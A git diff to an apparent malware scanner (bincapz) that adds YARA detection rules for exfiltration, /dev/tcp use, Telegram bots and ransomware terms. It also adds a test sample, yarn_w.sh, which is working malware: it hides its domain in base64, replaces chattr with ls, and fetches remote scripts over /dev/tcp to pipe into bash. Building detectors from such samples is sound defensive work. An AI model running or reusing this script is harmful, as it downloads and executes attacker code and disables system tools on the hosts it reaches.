diff --git a/pkg/bincapz/render.go b/pkg/bincapz/render.go index ebf2989a6..de50e1471 100644 --- a/pkg/bincapz/render.go +++ b/pkg/bincapz/render.go @@ -90,8 +90,8 @@ func RenderTable(fr *FileReport, w io.Writer) { if width > 110 { valWidth += (width - 110) } - if valWidth > 60 { - valWidth = 60 + if valWidth > 65 { + valWidth = 65 } klog.Infof("terminal width: %d / val width: %d", width, valWidth) diff --git a/rules/archives/zip.yara b/rules/archives/zip.yara index b834903cb..96356757e 100644 --- a/rules/archives/zip.yara +++ b/rules/archives/zip.yara @@ -5,6 +5,8 @@ rule zip : notable { strings: $ref = "ZIP64" fullword $ref2 = "archive/zip" + $ref3 = "zip_writer" fullword + $ref4 = "ZIP archive" fullword condition: any of them } diff --git a/rules/combo/exfil/osascript_http_zipper.yara b/rules/combo/exfil/osascript_http_zipper.yara new file mode 100644 index 000000000..37943ef98 --- /dev/null +++ b/rules/combo/exfil/osascript_http_zipper.yara @@ -0,0 +1,13 @@ + +rule osascript_http_zipper : suspicious { + meta: + description = "runs AppleScript, makes HTTP requests, zips files" + strings: + $ref = "osascript" fullword + $readdir = "readdir" fullword + $socket = "socket" fullword + $http = "HTTP" fullword + $zip = "zip_writer" + condition: + all of them +} diff --git a/rules/databases/mysql.yara b/rules/databases/mysql.yara new file mode 100644 index 000000000..9e68a2f04 --- /dev/null +++ b/rules/databases/mysql.yara @@ -0,0 +1,9 @@ + +rule mysql : notable { + meta: + description = "accesses MySQL databases" + strings: + $ref = "mysql" fullword + condition: + $ref +} \ No newline at end of file diff --git a/rules/databases/postgresql.yara b/rules/databases/postgresql.yara new file mode 100644 index 000000000..1cbc0cb0e --- /dev/null +++ b/rules/databases/postgresql.yara @@ -0,0 +1,10 @@ + +rule postgresql : notable { + meta: + description = "accesses PostgreSQL databases" + strings: + $ref = "postgresql" fullword + $ref2 = "github.com/go-pg" fullword + condition: + any of them +} \ No newline at end of file diff --git a/rules/databases/sqlite.yara b/rules/databases/sqlite.yara new file mode 100644 index 000000000..6993c8a95 --- /dev/null +++ b/rules/databases/sqlite.yara @@ -0,0 +1,9 @@ +rule sqlite : notable { + meta: + description = "accesses SQLite databases" + strings: + $ref = "sqlite" fullword + $ref3 = "sqlite3" fullword + condition: + any of them +} \ No newline at end of file diff --git a/rules/evasion/bash_tcp.yara b/rules/evasion/bash_tcp.yara new file mode 100644 index 000000000..6003513ce --- /dev/null +++ b/rules/evasion/bash_tcp.yara @@ -0,0 +1,9 @@ + +rule bash_tcp : suspicious { + meta: + description = "sends data via /dev/tcp (bash)" + strings: + $ref = /[\w \-\<]{0,32}>"{0,1}\/dev\/tcp\/[\$\{\/\:\-\w\"]{0,32}/ + condition: + $ref +} diff --git a/rules/evasion/content-length-0.yara b/rules/evasion/content-length-0.yara new file mode 100644 index 000000000..a63a9dfac --- /dev/null +++ b/rules/evasion/content-length-0.yara @@ -0,0 +1,10 @@ +rule content_length_0 : suspicious { + meta: + description = "Sets HTTP content length to zero" + strings: + $ref = "Content-Length: 0" + condition: + $ref +} + + diff --git a/rules/evasion/process-check.yara b/rules/evasion/process-check.yara index cb474ad00..0d8795313 100644 --- a/rules/evasion/process-check.yara +++ b/rules/evasion/process-check.yara @@ -3,7 +3,9 @@ rule activity_monitor_checker : suspicious { hash_2020_BirdMiner_tonsillith = "9f8dba1cea7c8a4d7701a6a3e2d826202ba7e00e30e9c836c734ad6842b8cb5e" hash_2020_BirdMiner_tormina = "4179cdef4de0eef44039e9d03d42b3aeca06df533be74fc65f5235b21c9f0fb1" strings: - $pgrep = /pgrep [\-\w]{0,4}"Activity Monitor"/ + $ps = "ps" fullword + $pgrep = "pgrep" fullword + $am = "Activity Monitor" fullword condition: - any of them + $am and any of ($p*) } diff --git a/rules/exfil/sysinfo_http.yara b/rules/exfil/sysinfo_http.yara new file mode 100644 index 000000000..6b5ea8ca6 --- /dev/null +++ b/rules/exfil/sysinfo_http.yara @@ -0,0 +1,10 @@ + +rule sysinfo_http : suspicious { + meta: + description = "sends host information via HTTP GET variables" + strings: + $ref = "&hostname=" + $ref2 = "&uname=" + condition: + any of them +} diff --git a/rules/exfil/telegram.yara b/rules/exfil/telegram.yara index fd8b853d8..df3bcbf64 100644 --- a/rules/exfil/telegram.yara +++ b/rules/exfil/telegram.yara @@ -4,8 +4,10 @@ rule telegram_bot : suspicious { ref = "https://github.com/bartblaze/community/blob/3f3997f8c79c3605ae6d5324c8578cb12c452512/data/yara/binaries/indicator_suspicious.yar#L676" strings: $s1 = "api.telegram.org" + $s1_b64 = "api.telegram.org" base64 $s3 = "Content-Disposition: form-data; name=\"" $p1 = "/sendMessage" + $p1_b64 = "/sendMessage" base64 $p2 = "/sendDocument" $p4 = "/sendLocation" condition: diff --git a/rules/fs/file-open.yara b/rules/fs/file-open.yara index 2523cb0bf..9c62c02c1 100644 --- a/rules/fs/file-open.yara +++ b/rules/fs/file-open.yara @@ -6,6 +6,7 @@ rule file_open : harmless { $fopen = "fopen" fullword $fopen64 = "fopen64" fullword $fclose = "fclose" fullword + $file_open = "file open failed" condition: any of them } diff --git a/rules/fs/file-sync.yara b/rules/fs/file-sync.yara index cc1328405..14bf6fe85 100644 --- a/rules/fs/file-sync.yara +++ b/rules/fs/file-sync.yara @@ -6,6 +6,7 @@ rule fsync : harmless { syscall = "fsync" strings: $ref = "fsync" fullword + $ref2 = "syscall.Fsync" fullword condition: any of them } diff --git a/rules/kernel/uname-get.yara b/rules/kernel/uname-get.yara index 0a73caba4..112aad417 100644 --- a/rules/kernel/uname-get.yara +++ b/rules/kernel/uname-get.yara @@ -6,6 +6,7 @@ rule uname : notable { syscall = "sysctl" strings: $uname = "uname" fullword + $uname2 = "syscall.Uname" fullword condition: any of them } diff --git a/rules/malware/family/stealthworker.yara b/rules/malware/family/stealthworker.yara new file mode 100644 index 000000000..3414af673 --- /dev/null +++ b/rules/malware/family/stealthworker.yara @@ -0,0 +1,8 @@ +rule stealthworker : critical { + meta: + description = "StealthWorker Worm/Trojan" + strings: + $ref = "StealthWorker/Worker" + condition: + all of them +} diff --git a/rules/net/ftp.yara b/rules/net/ftp.yara new file mode 100644 index 000000000..38c373770 --- /dev/null +++ b/rules/net/ftp.yara @@ -0,0 +1,9 @@ +rule ftp { + meta: + description = "File Transfer Protocol (FTP)" + strings: + $ref = "ftp.Dial" fullword + $ref2 = "EPSV" fullword + condition: + any of them +} diff --git a/rules/net/http-auth.yara b/rules/net/http-auth.yara new file mode 100644 index 000000000..932bdde86 --- /dev/null +++ b/rules/net/http-auth.yara @@ -0,0 +1,10 @@ +rule http_auth { + meta: + description = "makes HTTP requests with basic authentication" + strings: + $ref = "Www-Authenticate" + $ref2 = "WWW-Authenticate" + $ref3 = "www-authenticate" + condition: + any of them +} \ No newline at end of file diff --git a/rules/net/sendfile.yara b/rules/net/sendfile.yara index a2ad6d6b8..7279b8504 100644 --- a/rules/net/sendfile.yara +++ b/rules/net/sendfile.yara @@ -5,6 +5,7 @@ rule sendfile { ref = "https://man7.org/linux/man-pages/man2/sendfile.2.html" strings: $ref = "sendfile" fullword + $ref2 = "syscall.Sendfile" fullword condition: any of them } diff --git a/rules/net/url-request.yara b/rules/net/url-request.yara index 9ef684c83..63fa43b14 100644 --- a/rules/net/url-request.yara +++ b/rules/net/url-request.yara @@ -1,8 +1,10 @@ rule requests_urls : notable { meta: - description = "Makes network requests using a URL" + description = "requests resources via URL" strings: $ref = "NSMutableURLRequest" + $ref2 = "import requests" + $ref3 = "net/url" condition: any of them } diff --git a/rules/persistence/macos/launchd-manipulation.yara b/rules/persistence/macos/launchd-manipulation.yara index 916e9aafd..3bd73cdb7 100644 --- a/rules/persistence/macos/launchd-manipulation.yara +++ b/rules/persistence/macos/launchd-manipulation.yara @@ -5,7 +5,8 @@ rule launchctl : notable { platforms = "darwin" strings: $ref = "LaunchAgents" fullword + $ref2 = "launchctl" condition: - any of them + all of them } diff --git a/rules/process/detach_daemonize.yara b/rules/process/detach_daemonize.yara index e69de29bb..61eca3b97 100644 --- a/rules/process/detach_daemonize.yara +++ b/rules/process/detach_daemonize.yara @@ -0,0 +1,10 @@ + +rule detach : suspicious { + meta: + description = "process detaches and daemonizes" + strings: + $ref = "xdaemon" + $ref2 = "go-daemon" + condition: + any of them +} diff --git a/rules/ref/site/download.yara b/rules/ref/site/download.yara index e5f7628f3..8cedc2f26 100644 --- a/rules/ref/site/download.yara +++ b/rules/ref/site/download.yara @@ -13,6 +13,7 @@ rule download_sites : suspicious { $d_rentry = "rentry.co" $d_penyacom = "penyacom" $d_controlc = "controlc.com" + $d_anotepad = "anotepad.com" $d_privnote = "privnote.com" $d_hushnote = "hushnote" $not_mozilla = "download.mozilla.org" diff --git a/rules/ref/words/decryptor.yara b/rules/ref/words/decryptor.yara new file mode 100644 index 000000000..7b2e23271 --- /dev/null +++ b/rules/ref/words/decryptor.yara @@ -0,0 +1,8 @@ +rule decryptor : notable { + meta: + description = "References 'decryptor'" + strings: + $ref = "decryptor" + condition: + any of them +} \ No newline at end of file diff --git a/rules/ref/words/dropper.yara b/rules/ref/words/dropper.yara new file mode 100644 index 000000000..7719542f2 --- /dev/null +++ b/rules/ref/words/dropper.yara @@ -0,0 +1,9 @@ +rule decryptor : notable { + meta: + description = "References 'dropper'" + strings: + $ref = "dropper" fullword + $ref2 = "Dropper" fullword + condition: + any of them +} \ No newline at end of file diff --git a/rules/ref/words/locked-files.yara b/rules/ref/words/locked-files.yara new file mode 100644 index 000000000..ac4eb0b77 --- /dev/null +++ b/rules/ref/words/locked-files.yara @@ -0,0 +1,9 @@ +rule lockedFiles : suspicious { + meta: + description = "References 'locked files'" + strings: + $ref = "lockedFiles" + $ref2 = "lockedFileNames" + condition: + any of them +} \ No newline at end of file diff --git a/rules/ref/words/server_address.yara b/rules/ref/words/server_address.yara new file mode 100644 index 000000000..bac130353 --- /dev/null +++ b/rules/ref/words/server_address.yara @@ -0,0 +1,9 @@ +rule server_address : suspicious { + meta: + description = "references a 'server address', possible C2 client" + strings: + $underscores = /\w{0,32}server_addr\w{0,32}/ + $mixed = /\w{0,32}serverAddr\w{0,32}/ + condition: + any of them +} \ No newline at end of file diff --git a/rules/secrets/htpasswd.yara b/rules/secrets/htpasswd.yara new file mode 100644 index 000000000..bd177bb4c --- /dev/null +++ b/rules/secrets/htpasswd.yara @@ -0,0 +1,9 @@ +rule htpasswd : notable { + meta: + description = "Access .htpasswd files" + strings: + $ref = ".htpasswd" + $ref2 = "Htpasswd" + condition: + any of them +} diff --git a/rules/signal/send.yara b/rules/signal/send.yara index 464bf944e..a5fc41fd5 100644 --- a/rules/signal/send.yara +++ b/rules/signal/send.yara @@ -4,6 +4,7 @@ rule kill : harmless { pledge = "proc" strings: $kill = "_kill" fullword + $go = "syscall.Kill" fullword condition: any of them } \ No newline at end of file diff --git a/testdata/Linux/yarn_w.sh b/testdata/Linux/yarn_w.sh new file mode 100644 index 000000000..121bf1397 --- /dev/null +++ b/testdata/Linux/yarn_w.sh @@ -0,0 +1,54 @@ +#!/bin/bash +#variables +lspath=$(which ls) +domain=$(echo Yi45LTktOC5jb20K|base64 -d) +mainurl=$(echo aHR0cDovL2IuOS05LTguY29tL2JyeXNqCg==|base64 -d) +#mv command + +if [ -x /bin/chattr ];then + mv /bin/chattr /bin/zzhcht +elif [ -x /usr/bin/chattr ];then + mv /usr/bin/chattr /usr/bin/zzhcht +elif [ -x /usr/bin/zzhcht ];then + export CHATTR=/usr/bin/zzhcht +elif [ -x /bin/zzhcht ];then + export CHATTR=/bin/zzhcht +else + if [ $(command -v yum) ];then + yum -y reinstall e2fsprogs + if [ -x /bin/chattr ];then + mv /bin/chattr /bin/zzhcht + elif [ -x /usr/bin/chattr ];then + mv /usr/bin/chattr /usr/bin/zzhcht + fi + else + apt-get -y reinstall e2fsprogs + if [ -x /bin/chattr ];then + mv /bin/chattr /bin/zzhcht + elif [ -x /usr/bin/chattr ];then + mv /usr/bin/chattr /usr/bin/zzhcht + fi + fi +fi +if [ -x /bin/zzhcht ];then + export CHATTR=/bin/zzhcht && cp $lspath /bin/chattr && /bin/zzhcht +ia /bin/chattr +elif [ -x /usr/bin/zzhcht ];then + export CHATTR=/usr/bin/zzhcht && cp $lspath /usr/bin/chattr && /usr/bin/zzhcht +ia /usr/bin/chattr +else + export CHATTR=chattr +fi + + +vurl() { + IFS=/ read -r proto x host query <<<"$1" + exec 3<>"/dev/tcp/${host}/${PORT:-80}" + echo -en "GET /${query} HTTP/1.0\r\nHost: ${host}\r\n\r\n" >&3 + (while read -r l; do echo >&2 "$l"; [[ $l == $'\r' ]] && break; done && cat ) <&3 + exec 3>&- +} + +if [ "$(id -u)" = "0" ];then +vurl ${mainurl}/d/ar.sh |bash +else +vurl ${mainurl}/d/ai.sh |bash +fi